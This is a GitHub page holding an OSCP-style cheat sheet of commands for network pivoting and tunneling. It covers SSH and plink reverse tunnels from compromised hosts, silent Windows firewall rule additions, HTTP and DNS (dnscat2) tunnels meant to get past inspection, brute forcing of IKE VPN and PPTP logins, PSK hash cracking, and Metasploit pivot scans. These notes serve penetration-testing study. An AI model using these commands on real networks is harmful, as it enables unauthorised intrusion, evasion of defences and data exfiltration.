forked from sd-geek/OSCP
-
Notifications
You must be signed in to change notification settings - Fork 14
/
18 - Networking, Pivoting and Tunneling
147 lines (114 loc) · 5.63 KB
/
18 - Networking, Pivoting and Tunneling
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
-------------- Port Forwarding --------------
Port Forwarding - accept traffic on a given IP address and port and redirect it to a different IP address and port
# apt-get install rinetd
# cat /etc/rinetd.conf
# bindadress bindport connectaddress connectport w.x.y.z 53 a.b.c.d 80
SSH Local Port Forwarding: supports bi-directional communication channels
# ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
SSH Remote Port Forwarding: Suitable for popping a remote shell on an internal non routable network
# ssh <gateway> -R <remote port to bind>:<local host>:<local port>
SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local attacking box to tunnel ALL incoming traffic to ANY host in the DMZ network on ANY PORT
# ssh -D <local proxy port> -p <remote port> <target>
Proxychains - Perform nmap scan within a DMZ from an external computer
Create reverse SSH tunnel from Popped machine on :2222
# ssh -f -N -R 2222:$ip:22 root@$ip
Create a Dynamic application-level port forward on 8080 thru 2222
# ssh -f -N -D $ip:8080 -p 2222 hax0r@$ip
Leverage the SSH SOCKS server to perform Nmap scan on network using proxy chains
# proxychains nmap --top-ports=20 -sT -Pn $ip/24
HTTP Tunneling
# nc -vvn $ip 8888
Traffic Encapsulation - Bypassing deep packet inspection
http_tunnel
On server side:
sudo hts -F <server_ip_addr>:<port_of_your_app> 80
On client side:
sudo htc -P <my_proxy.com:proxy_port> -F <port_of_your_app> <server_ip_addr>:80
stunnel
Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network
Tunnel on port 22
# plink -l root -pw pass -R 3389:$ip:3389 $ip
Port 22 blocked? Try port 80? or 443?
# plink -l root -pw 23847sd98sdf987sf98732 -R 3389:$ip:3389 $ip -P 80
Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection)
Windows machine add required firewall rules without prompting the user
# netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
# netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
# netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
# netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
Start the http tunnel client
httptunnel_client.exe
Create HTTP reverse shell by connecting to localhost port 3000
# plink -l root -pw 23847sd98sdf987sf98732 -R 3389:$ip:3389 $ip -P 3000
VLAN Hopping
# git clone https://github.com/nccgroup/vlan-hopping.git
# chmod 700 frogger.sh
# ./frogger.sh
--------------- VPN Hacking ---------------
Identify VPN servers:
# ./udp-protocol-scanner.pl -p ike $ip
Scan a range for VPN servers:
# ./udp-protocol-scanner.pl -p ike -f ip.txt
Use IKEForce to enumerate or dictionary attack VPN servers:
# pip install pyip
# git clone https://github.com/SpiderLabs/ikeforce.git
Perform IKE VPN enumeration with IKEForce:
# ./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
Bruteforce IKE VPN using IKEForce:
# ./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
Use ike-scan to capture the PSK hash:
# ike-scan
# ike-scan TARGET-IP
# ike-scan -A TARGET-IP
# ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
# ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
Use psk-crack to crack the PSK hash
# psk-crack hash-file.txt
# pskcrack
# psk-crack -b 5 TARGET-IPkey
# psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
# psk-crack -d /path/to/dictionary-file TARGET-IP-key
--------------- PPTP Hacking ---------------
Identifying PPTP, it listens on TCP: 1723
NMAP PPTP Fingerprint:
# nmap –Pn -sV -p 1723 TARGET(S)
PPTP Dictionary Attack
# thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
--------------- Port Forwarding/Redirection ---------------
PuTTY Link tunnel - SSH Tunneling
Forward remote port to local address:
# plink.exe -P 22 -l root -pw "1337" -R 445:$ip:445 $ip
--------------- SSH Pivoting ---------------
SSH pivoting from one network to another:
# ssh -D $ip:1010 -p 22 user@$ip
DNS Tunneling
# dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.
Attacking Machine Installation:
# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install
Run dnscat2:
# ruby ./dnscat2.rb
# dnscat2> New session established: 1422
# dnscat2> session -i 1422
Target Machine:
https://downloads.skullsecurity.org/dnscat2/
https://github.com/lukebaggett/dnscat2-powershell/
# dnscat --host <dnscat server_ip>
--------------------- Pivoting through msf shell / meterperter ---------------------
msf5 > use post/multi/manage/autoroute
msf5 post(multi/manage/autoroute) > set session 1
msf5 post(multi/manage/autoroute) > exploit
Ping Sweep from Pivot
msf5 > use post/multi/gather/ping_sweep
msf5 post(multi/gather/ping_sweep) > set rhosts 172.18.0.0-255
msf5 post(multi/gather/ping_sweep) > set session 1
msf5 post(multi/gather/ping_sweep) > exploit
Port Scan from Pivot
msf5 > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.0-4
msf5 auxiliary(scanner/portscan/tcp) > set threads 10
msf5 auxiliary(scanner/portscan/tcp) > exploit